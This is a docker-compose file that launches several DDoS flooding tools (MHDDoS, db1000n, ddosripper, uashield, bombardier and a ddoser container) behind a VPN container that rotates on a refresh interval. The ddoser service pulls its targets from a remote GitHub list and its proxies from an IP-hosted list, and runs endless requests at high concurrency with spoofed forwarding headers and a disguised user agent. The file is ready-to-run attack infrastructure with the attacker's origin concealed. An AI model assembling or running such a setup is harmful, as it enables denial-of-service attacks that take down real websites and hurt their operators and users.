version: "3"
services:
  kali:
    build: ./kali
    network_mode: "service:vpn"
    depends_on: 
      - vpn
    command: "tail -f /dev/null"
  test:
    image: alpine/curl:3.14
    network_mode: "service:vpn"
    command: "curl --retry 5 --connect-timeout 5 -m 5 ipinfo.io"
    depends_on: 
      - vpn
  bombardier:
    image: alpine/bombardier
    network_mode: "service:vpn"
    depends_on: 
      - vpn
  uashield:
    build: ./uashield
    command: "500 false"
    network_mode: "service:vpn"
    depends_on: 
      - vpn
  ddosripper:
    build: ./ddosripper
    network_mode: "service:vpn"
    depends_on: 
      - vpn
    volumes:
      - ./ddosripper/docker_entrypoint.sh:/app/docker_entrypoint.sh
    entrypoint: 
      - /app/docker_entrypoint.sh
  checksites:
    image: loginincorrect/checksites
    network_mode: "service:vpn"
    depends_on: 
      - vpn
  db1000n:
    image: ghcr.io/arriven/db1000n
    network_mode: "service:vpn"
    depends_on: 
      - vpn
  ddoser:
    image: imsamurai/ddoser
    command: "--target-urls-file https://raw.githubusercontent.com/hem017/cytro/master/targets_all.txt --concurrency 500 --timeout 20 --with-random-get-param --user-agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36' --count 0 --log-to-stdout --proxy-url 'http://143.244.166.15/proxy.list' --restart-period 600 --random-xff-ip"
  MHDDoS:
    build: ./MHDDoS
    network_mode: "service:vpn"
    depends_on: 
      - vpn
  refresher:
    build: ./refresher
    command: "${VPN_REFRESH_INTERVAL}"
    network_mode: "service:vpn"
    depends_on: 
      - vpn
  vpn:
    image: qmcgaw/gluetun
    cap_add:
      - NET_ADMIN
    devices:
      - /dev/net/tun
    privileged: true
    tty: true
    environment:
      - VPN_SERVICE_PROVIDER=${VPN_TYPE}
      - OPENVPN_USER=${VPN_USER}
      - OPENVPN_PASSWORD=${VPN_CODE}
      - SERVER_COUNTRIES=${VPN_COUNTRY}
      - SERVER_HOSTNAMES=${VPN_SERVER_HOSTNAMES}
      - OPENVPN_PROTOCOL=${VPN_PROTOCOL}
    volumes: 
        - ./gluetun:/gluetun
    deploy:
      restart_policy:
        condition: on-failure
        max_attempts: 300